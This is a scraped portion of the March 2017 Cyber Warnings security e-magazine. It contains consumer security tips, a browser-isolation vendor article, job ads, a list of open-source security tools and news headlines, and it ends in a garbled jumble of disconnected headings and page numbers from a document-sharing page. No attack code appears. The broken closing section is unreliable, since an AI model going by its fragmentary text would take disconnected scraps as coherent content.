Smiths plc. He is currently a board member at Blacksands Security. Bob
has an extensive network throughout the tech industry. Since becoming an
executive consultant Bob has been helping his select clients redefine how
information technology drives their business to improve results. Bob has
won recent innocentive challenges and was featured in Wired magazines
Sony forum for the future 2025. Bob does speaking engagements as a
futurist and tech advocate.
-Strategy CIO is a boutique consultancy that provides only top technology

experts to select customers who want fast consistently successful results.
StrategyCIO.com
-Blacksands is a software security company providing unique low cost easy to use software with
absolute access control and ultra-high security through its invisible edge technology.
Blacksands.danati.com
Bob can be contacted at:
Rmills@strategycio.com or Bmills@blacksandsinc.com

Top 5 Cyber Security Tips Every Internet User Must Consider
Must use tips for every internet user
by Anas Baig, Digital Security Enthusiast, Gaditek
The process of evolution affects every living thing equally; from the predator to the preyed upon.
While the internet users are getting smarter, in terms of their online security, the hackers too are
upping their game. Similar to the crime rate in the physical world, the rate of cyber crimes too is
on the rise.
Given the alarming situation, it is only logical for people to arm themselves with solid security
strategies and adopt the basic security fundamentals to remain as safe as possible on the
internet. Here are the five tips or guidelines to help you from becoming the hunted:
1. Create & Use Complex Password
There is more to passwords then what meets the eyes since they are your first line of defense.
Sadly, 55% of internet users not only have weak passwords, they use the same password for all
their online accounts, be it social or financial.
They dont change their password for months on, which translates into an open invitation for
hackers to compromise just one account and get access to all the accounts.
My personal belief about passwords is Dont change your password regularly; just choose one
good, strong password for different accounts. Make your password at least 12 characters long
and include numbers, special characters (variety of characters), mixed small & capital letters.
Last year, Keeper Security, a password management company, released a list of the most
common passwords of 2016.
The most popular password that made up nearly 17 percent of the 10 million passwords the
company analyzed was 123456. Password was also among the top 10 passwords, coming in
as the eighth most common password on the list.
2. Use A VPN
A Virtual Private Network or a VPN is a service that creates a secure encrypted connection,
which can be best visualized as a tunnel between your computer and the server operated by a
VPN service, encrypting your online communications in the process to help you remain
protected against data snoopers.
A VPN also gives you complete online freedom by masking your IP with its dedicated IP
address. So, while a VPN keeps you safe online, it also lets you surf without any restraints.

3. Use Multi-Factor Authentication
Multi-factor or Two-Factor authentication is the best practice for securing access to your online
accounts. Passwords can be compromised, and once they are, its easy for criminals to gain
access. Multi-factor authentication requires an extra step to log in to authenticate your identity,
whether that means email authentication, or a text message sent to your phone. While these
protocols often spark protest from employees, this is a great way to ensure an additional layer of
security.
4. Keep Your System Up-To-Date
Cyber criminals are relentless and they come up with new ways to infiltrate security systems, so
it pays to make sure your browser has the latest security patches installed. In order to minimize
the risk of exposure or low performance, security updates must be applied as soon as they are
released. When prompted to update your operating system software just do it!
5. Keep Your Inbox Safe
Always enable email scanning via your antivirus. Dont trust attachments, in fact you should
always be careful when clicking on attachments or links in any email. If its unexpected or
suspicious for any reason, dont click on it.
Double check the URL of the website the link takes you to: bad actors will often take advantage
of spelling mistakes to direct you to harmful domains.
Also, disable automatic previewing and never respond to email requests for personal or
company account information. According to Trend micro, 91% of advanced cyber attacks begin
with emails.
To Conclude
Safeguarding data is essential for all internet users. Remember, the internet is evolving and is in
a vulnerable state. You might think your data is not important to hackers, but this is where you
would be completely wrong.
The tips mentioned above might not make you bulletproof on the internet, but they will make it
that much harder for a hacker to single you out.
About The Author
My Name is Anas Baig, the Digital Marketer & Security Enthusiast of the Gaditek. He loves to
read & write about Digital Security & Privacy. If you are interested to get tweets about Marketing
& Security! Follow him on twitter @anasbaigdm

Protecting Government by Expecting the Worst
Browser isolation can kill even the stealthiest threats
The proverb Hope for the best, but prepare for the worst, dates to the 1700s, but applies
perfectly to anyone trying to keep their organizations safe from modern threats to cybersecurity.
Everyone should still invest in whatever detection and prevention systems they can, but know
that at some point those will inevitably fail. The attacks are too numerous, and the adversaries
too sophisticated to think any differently.
Government has been in the center of this security maelstrom for years now, and while it works
to constantly shore up its defenses, there have been numerous high profile attacks, such as the
breach at OPM, that were highly successful for the attackers. The problem for government is
two-fold. First, the information it protects is extremely valuable to some adversaries such as rival
nation states, so it will always be in the crosshairs. Secondly, the government, like most
organizations, built up defenses based on the concept of a security perimeter. That may still
work for physical security, but cybersecurity can no longer rely on that classic strategy.
In cybersecurity, the perimeter no longer exists. Almost every agency now has a significant part
of its workforce using desktop computers and laptops outside of the old firewall-protected
frontlines. Agencies that rely heavily on contractors have even more assets outside of their
direct control and protection. Any of those outside assets could become a pathway used by
attackers to get at the core data they want to steal.
Agencies and their federal contractors are all looking for new ways to secure assets working
outside of a known perimeter. For the contractors, being able to prove that they are doing
everything they can to secure those assets could mean the difference between a contract award
and having their bids rejected. For agencies, they simply cant afford any more high-profile
breaches.
What makes outside assets so insecure is that they are often operating outside a firewall or
network support structure. The only protection the laptop has against threats is whatever is
installed locally. Unfortunately, one thing that is on virtually every endpoint is a browser, and it is
the number one pathway used by malware to infect systems. So, something that every system
is sure to have is accounting for almost 90 percent of all successful breaches.
To try and protect browsers, there are numerous programs designed to monitor systems and
detect malware ranging from classic anti-virus tools to memory resident scanners. They can be
highly successful, especially for low-level attacks, but all of them eventually miss something
which can open a doorway into a federal network. All of those prevention programs are only
listening to half of the classic phrase. They hope for the best, but dont also prepare for the
worst.
And that is where the new technology of virtual isolation can be deployed to protect federal
assets and those of contractors operating outside of a firewall. Only virtual isolation allows users
to detect, analyze and destroy threats attempting to enter computers through their browsers,
while also providing a safety net that eliminates problems and keeps a system secure even if
everything else fails. It expects the worst, that a threat will eventually be able to slip past those
defenses undetected, and acts accordingly to protect a system even if it cant see the danger.
Virtual isolation uses the science of virtualization to remove the threat window posed by
browsers. Every time a browser is activated, a new instance is created that is kept separate
from the rest of the system and other programs. The virtual browser acts normally for a user,
who may not even realize that the program is running inside a protected container.
Any threat that tries to alter the browser can be detected normally by whatever protection is
active on the system. Threats can thus be captured and analyzed if an organization wants to do
that as part of a threat intelligence program. However, virtual browser isolation also assumes
that detection, no matter how sophisticated, will eventually fail. An advanced threat may be able
to avoid detection and make changes to the browser program or settings so that it can come
back later and compromise a system. That wont work when virtual isolation is on the job.
Every time a browser is closed, the entire container including any undetected threats that may
be lurking there is destroyed. Each time a user brings up a browser, a brand-new instance is
created in an isolated container with nothing persisting from previous browser sessions. Virtual
isolation thus assumes that every browser instance has been compromised it expects the
worst and acts accordingly.
Using browser isolation keeps systems working outside of a firewall secure by isolating the
browser and burning it down after every use. Protection programs can still catch incoming
malware, but even if they dont, the system is never in danger of compromise. In todays
cybersecurity landscape where battles are fought without the benefit of a traditional perimeter,
only a robust and innovative technology like virtual isolation can keep systems working outside
of an agency completely safe from all threats both the ones you discover, and the invisible
ones you will never see.
About the Author

Lance Cottrell, Chief Scientist, Passages Lance Cottrell founded Anonymizer in 1995,
which was acquired by Ntrepid (then Abraxas) in 2008. Anonymizers technologies form the
core of Ntrepids Internet misattribution and security products. As Chief Scientist, Lance
continues to push the envelope with the new technologies and capabilities required to stay
ahead of rapidly evolving threats. Lance is a well-known expert on security, privacy, anonymity,
misattribution and cryptography. He speaks frequently at conferences and in interviews. Lance
is the principle author on multiple Internet anonymity and security technology
patents. He started developing Internet anonymity tools in 1992 while pursuing a PhD. in
physics, eventually leaving to work on those technologies full time. Lance holds an M.S. in
physics from the University of California, San Diego and a B.S. in physics from the University of
California, Santa Cruz. He has served on the advisory board of the UCSD Libraries and the
American Public University IT Industry Advisory Council.

Cyber Security Solutions Architect
Early stage start-up with multiple job openings nationwide for Cyber Security Solution
Architects.
Market compensation. Equity!
CISSP
5+ years customer facing pre-sales/solution architect
Minimum of 10 POCs
5+ years Splunk experience
5+ year Cyber Security experience
Up to 50% travel
================================================================
Big Data Solutions Architect
Start-up with multiple job openings nationwide for Big Data Solution Architects.
Market compensation. Equity!
5+ years experience:
Solutions Architect
Minimum of 10 POCs
Distributed systems background
Hadoop
HDFS
Java
Python
Up to 50% travel
Candidates interested in either position should email mike@spyglasspartners.com or call

603-552-5152.

NSA Spying Concerns? Learn Counterveillance
Free Online Course Replay at www.snoopwall.com/free
"NSA Spying Concerns? Learn Counterveillance" is a 60-minute recorded online instructor-led

course for beginners who will learn how easily we are all being spied upon - not just by the NSA
but by cyber criminals, malicious insiders and even online predators who watch our children;
then you will learn the basics in the art of Counterveillance and how you can use new tools and
techniques to defend against this next generation threat of data theft and data leakage.
The course has been developed for IT and IT security professionals including Network
Administrators, Data Security Analysts, System and Network Security Administrators, Network
Security Engineers and Security Professionals.
After you take the class, you'll have newfound knowledge and understanding of:
1. How you are being Spied upon.

2. Why Counterveillance is so important.
3. What You can do to protect private information.
Course Overview:
How long has the NSA been spying on you?

What tools and techniques have they been using?
Who else has been spying on you?
What tools and techniques they have been using?
What is Counterveillance?
Why is Counterveillance the most important missing piece of your security posture?
How hard is Counterveillance?
What are the best tools and techniques for Counterveillance?
Your Enrollment includes :
1. A certificate for one free personal usage copy of the Preview Release of SnoopWall for
Android
2. A worksheet listing the best open and commercial tools for Counterveillance
3. Email access to the industry leading Counterveillance expert, Gary S. Miliefsky, our educator.
4. A certificate of achievement for passing the Concise-Courses Counterveillance 101 course.
Visit this course online, sponsored by Concise-Courses.com and SnoopWall.com at

http://www.snoopwall.com/free

Top Twenty INFOSEC Open Sources
Our Editor Picks His Favorite Open Sources You Can Put to Work Today
There are so many projects at sourceforge its hard to keep up with them. However, thats not
where we are going to find our growing list of the top twenty infosec open sources. Some of
them have been around for a long time and continue to evolve, others are fairly new. These are
the Editor favorites that you can use at work and some at home to increase your security
posture, reduce your risk and harden your systems. While there are many great free tools out
there, these are open sources which means they comply with a GPL license of some sort that
you should read and feel comfortable with before deploying. For example, typically, if you
improve the code in any of these open sources, you are required to share your tweaks with the
entire community nothing proprietary here.
Here they are:
1. TrueCrypt.org The Best Open Encryption Suite Available (Version 6 & earlier)
2. OpenSSL.org The Industry Standard for Web Encryption
3. OpenVAS.org The Most Advance Open Source Vulnerability Scanner
4. NMAP.org The Worlds Most Powerful Network Fingerprint Engine
5. WireShark.org The Worlds Foremost Network Protocol Analyser
6. Metasploit.org The Best Suite for Penetration Testing and Exploitation
7. OpenCA.org The Leading Open Source Certificate and PKI Management -
8. Stunnel.org The First Open Source SSL VPN Tunneling Project
9. NetFilter.org The First Open Source Firewall Based Upon IPTables
10. ClamAV The Industry Standard Open Source Antivirus Scanner
11. PFSense.org The Very Powerful Open Source Firewall and Router
12. OSSIM Open Source Security Information Event Management (SIEM)
13. OpenSwan.org The Open Source IPSEC VPN for Linux
14. DansGuardian.org The Award Winning Open Source Content Filter
15. OSSTMM.org Open Source Security Test Methodology
16. CVE.MITRE.org The Worlds Most Open Vulnerability Definitions
17. OVAL.MITRE.org The Worlds Standard for Host-based Vulnerabilities
18. WiKiD Community Edition The Best Open Two Factor Authentication
19. Suricata Next Generation Open Source IDS/IPS Technology
20. CryptoCat The Open Source Encrypted Instant Messaging Platform
Please do enjoy and share your comments with us if you know of others you think should
make our list of the Top Twenty Open Sources for Information Security, do let us know at
marketing@cyberdefensemagazine.com.
(Source: CDM)

National Information Security Group Offers FREE Techtips
Have a tough INFOSEC Question Ask for an answer and YE Shall Receive
Heres a wonderful non-profit

organization. You can join for free,
start your own local chapter and so
much more.
The best service of NAISG are

their free Techtips. It works like
this, you join the Techtips mailing
list.
Then of course youll start to see a stream of emails with

questions and ideas about any area of INFOSEC. Lets say
you just bought an application layer firewall and cant figure
out a best-practices model for firewall log storage, you
could ask thousands of INFOSEC experts in a single email
by posting your question to the Techtips newsgroup.
Next thing you know, a discussion ensues and youll have

more than one great answer. Its the NAISG.orgs best kept
secret.
So use it by going here:
http://www.naisg.org/techtips.asp
SOURCES: CDM and NAISG.ORG
SIDENOTE: Dont forget to tell your friends to

register for Cyber Defense Magazine at:
http://register.cyberdefensemagazine.com
where they (like you) will be entered into a monthly drawing

for the Award winning Lavasoft Ad-Aware Pro, Emsisoft Anti-malware and
our new favorite system cleaner from East-Tec called Eraser 2013.

Job Opportunities
Send us your list and well post it in the magazine for free, subject to editorial approval
and layout. Email us at marketing@cyberdefensemagazine.com
Free Monthly Cyber Warnings Via Email

Enjoy our monthly electronic editions of our Magazines for FREE.
This magazine is by and for ethical information security professionals with a twist on innovative
consumer products and privacy issues on top of best practices for IT security and Regulatory
Compliance. Our mission is to share cutting edge knowledge, real world stories and
independent lab reviews on the best ideas, products and services in the information technology
industry. Our monthly Cyber Warnings e-Magazines will also keep you up to speed on whats
happening in the cyber crime and cyber
warfare arena plus well inform you as next
generation and innovative technology
vendors have news worthy of sharing with
you so enjoy.
You get all of this for FREE, always, for our

electronic editions.
Click here to signup today and within

moments, youll receive your first email from
us with an archive of our newsletters along
with this months newsletter.
By signing up, youll always be in the loop

with CDM.

Cyber Warnings E-Magazine March 2017
Sample Sponsors:
To learn more about us, visit us online at http://www.cyberdefensemagazine.com/

Dont Miss Out on a Great Advertising Opportunity.
Join the INFOSEC INNOVATORS MARKETPLACE:
First-come-first-serve pre-paid placement
One Year Commitment starting at only $199
Five Year Commitment starting at only $499
http://www.cyberdefensemagazine.com/infosec-innovators-marketplace
Now Includes:
Your Graphic or Logo
Page-over Popup with More Information
Hyperlink to your website
BEST HIGH TRAFFIC OPPORTUNITY FOR INFOSEC INNOVATORS
Email: marketing@cyberdefensemagazine.com for more information.

Cyber Warnings Newsflash for March
2017
Highlights of CYBER CRIME and CYBER
WARFARE Global News Clippings
Here is a summary of this months cyber security news.

Get ready to read on and click the links below the titles to
read the full stories. So find those of interest to you and
read on through your favorite web browser
Nokia Study: Smartphone Malware Spiked 400% in '16
http://www.investopedia.com/news/nokia-study-smartphone-malware-spiked-400-16/
Emerging APAC markets more prone to malware
http://www.computerweekly.com/news/450415574/Emerging-APAC-markets-more-prone-to-
malware
RogueKillerCMD is a command line malware hunter
https://betanews.com/2017/03/29/roguekillercmd-is-a-command-line-malware-hunter/
Industrial facilities infected with malware 3,000 times a year
http://fuelfix.com/blog/2017/03/23/industrial-facilities-infected-with-malware-3000-times-a-year-
researchers-say/

Russian Hacker Admits Committing PC Fraud with Citadel Malware Kit
http://www.spamfighter.com/News-20824-Russian-Hacker-Admits-Committing-PC-Fraud-with-
Citadel-Malware-Kit.htm
MALWARE THAT TARGETS BOTH MICROSOFT, APPLE OPERATING SYSTEMS FOUND
https://threatpost.com/malware-that-targets-both-microsoft-apple-operating-systems-
found/124531/
Malware finds unwitting ally in GitHub
http://www.infoworld.com/article/3184399/security/malware-finds-unwitting-ally-in-github.html
Cyber Criminals Spread Malware by Using Fake Telecom Stations
http://www.spamfighter.com/News-20820-Cyber-Criminals-Spread-Malware-by-Using-Fake-
Telecom-Stations.htm
Evil Malware Turns Antivirus Software Against PCs
http://www.laptopmag.com/articles/double-agent-malware-antivirus
Stingray for criminals: spreading mobile malware with fake cellphone towers
https://boingboing.net/2017/03/29/democratizing-crime.html
Russian Hacker Pleads Guilty for Role in Infamous Linux Ebury Malware
https://www.bleepingcomputer.com/news/security/russian-hacker-pleads-guilty-for-role-in-
infamous-linux-ebury-malware/

Swearing Trojan malware in China heralds things to come in the U.S.
http://www.cio.com/article/3186204/security/swearing-trojan-in-china-heralds-malware-to-come-
in-the-us.html
New Cross-platform Malware Attacks Both Windows and Mac OS X Computers
https://themerkle.com/new-cross-platform-malware-attacks-both-windows-and-mac-os-x-
computers/
Malware 'disguised as Siemens software drills into 10 industrial plants'
https://www.theregister.co.uk/2017/03/22/malware_siemens_plc_firmware/
Google Play faces cat and mouse game with sneaky Android malware
http://www.pcworld.com/article/3184421/security/google-play-faces-cat-and-mouse-game-with-
sneaky-android-malware.html
Microsoft Word macro malware automatically adapts attack techniques for macOS, Windows
http://appleinsider.com/articles/17/03/24/microsoft-word-macro-malware-automatically-adapts-
attack-techniques-for-macos-windows
New MagikPOS Malware Targets Point-of-Sale Systems In US & Canada
http://www.darkreading.com/attacks-breaches/new-magikpos-malware-targets-point-of-sale-
systems-in-us-and-canada-/d/d-id/1328434
Malware: the battle that doesn't end
http://www.cso.com.au/article/616861/malware-battle-doesn-t-end/

LATEST TAX SCAMS INCLUDE PHISHING LURES, MALWARE
https://threatpost.com/latest-tax-scams-include-phishing-lures-malware/124431/
Batch of Android phones reportedly shipped with malware pre-installed
http://www.wired.co.uk/article/android-phones-hiding-pre-installed-malware
FILELESS MALWARE CAMPAIGNS TIED TO SAME ATTACKER
https://threatpost.com/fileless-malware-campaigns-tied-to-same-attacker/124369/

Copyright (C) 2016, Cyber Defense Magazine, a division of STEVEN G. SAMUELS
LLC. 848 N. Rainbow Blvd. #4496, Las Vegas, NV 89107. EIN: 454-18-8465, DUNS#
078358935. All rights reserved worldwide. marketing@cyberdefensemagazine.com
Cyber Warnings Published by Cyber Defense Magazine, a division of STEVEN G.
SAMUELS LLC.Cyber Defense Magazine, CDM, Cyber Warnings, Cyber Defense Test
Labs and CDTL are Registered Trademarks of STEVEN G. SAMUELS LLC. All rights
reserved worldwide. Copyright 2016, Cyber Defense Magazine. All rights reserved.
No part of this newsletter may be used or reproduced by any means, graphic,
electronic, or mechanical, including photocopying, recording, taping or by any
information storage retrieval system without the written permission of the publisher
except in the case of brief quotations embodied in critical articles and reviews. Because
of the dynamic nature of the Internet, any Web addresses or links contained in this
newsletter may have changed since publication and may no longer be valid. The views
expressed in this work are solely those of the author and do not necessarily reflect the
views of the publisher, and the publisher hereby disclaims any responsibility for them.
Cyber Defense Magazine

848 N. Rainbow Blvd. #4496, Las Vegas, NV 89107.
EIN: 454-18-8465, DUNS# 078358935.
All rights reserved worldwide.
marketing@cyberdefensemagazine.com
www.cyberdefensemagazine.com
Cyber Defense Magazine - Cyber Warnings rev. date: 02/22/2017


Cyber Warnings

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Cyber Warnings

Uploaded by

Copyright:

Available Formats

; Cyber Warnings E-Magazine March 2017 Edition

Improve Company Cyber Security While Staying on Budget .................. 23

IT Security - Lost Cause? ......................................................................... 69 CONTACT US:

Job Opportunities ..................................................................................... 86

Free Monthly Cyber Warnings Via Email ................................................. 86

Cyber Warnings Newsflash for March 2017............................................. 89

2 Cyber Warnings E-Magazine March 2017 Edition

To our faithful readers, Enjoy

3 Cyber Warnings E-Magazine March 2017 Edition

Software Security in the Software Development Lifecycle

Figure 1: Security processes superimposed over the software design lifecycle.

Design and architecture: As candidate architectures become available, reviews must

6 Cyber Warnings E-Magazine March 2017 Edition

Secure communications keeping data-transfer secure but also preventing unwanted

The Role of SAST tools in a security-first approach

Continuous source code quality and security assurance

About The Author

Bill can be reached online at bgraham@grammatech.com

7 Cyber Warnings E-Magazine March 2017 Edition

8 Cyber Warnings E-Magazine March 2017 Edition

9 Cyber Warnings E-Magazine March 2017 Edition

About The Author

He has presented at regional InfoSec conferences. Charles Parker, II can be

10 Cyber Warnings E-Magazine March 2017 Edition

Held in Australias capital city Canberra for the last three

The conference is coordinated by the ACSC which is a

Accordingly, this conference provides a strong focus on

The conference opened with a keynote from Dr.

Dr. Frincke covered the rather fascinating concept of

As automation, deep-learning and other AI related technologies continue to mature and

12 Cyber Warnings E-Magazine March 2017 Edition

Momentum from Australias Cyber Security Strategy

The ACSGN is a unique example of how

Meet Australias Cyber Roo

Australias #CensusFail Investigation Deepens

13 Cyber Warnings E-Magazine March 2017 Edition

The importance of diversity in Cyber Security

About The Author

Michael McKinnon is a cyber security expert at Sense of Security a

Michael can be reached online via email at michaelm@senseofsecurity.com.au and invites

14 Cyber Warnings E-Magazine March 2017 Edition

Ransomware is continually evolving. Early methods simply restricted access to user

As security protocols such as signature-based detection, sandboxing and machine-

The New Vector

15 Cyber Warnings E-Magazine March 2017 Edition

This brings up another concern: what, as a nation, do we do about cybersecurity? There is a

19 Cyber Warnings E-Magazine March 2017 Edition

Should governments have authority to request keys/backdoors to all types of

20 Cyber Warnings E-Magazine March 2017 Edition

About The Author

I am a Distinguished Professor in the School of Electrical Engineering and

This Q&A was conducted by the Association for Computing Machinery

21 Cyber Warnings E-Magazine March 2017 Edition

Stay Ahead of the Threat

Implement Security Protocols

23 Cyber Warnings E-Magazine March 2017 Edition

Keep Your Software Updated

Use the Tools at Your Disposal

About the Author

24 Cyber Warnings E-Magazine March 2017 Edition

26 Cyber Warnings E-Magazine March 2017 Edition

About The Author

Since Milica Djekic graduated at the Department of Control Engineering at

27 Cyber Warnings E-Magazine March 2017 Edition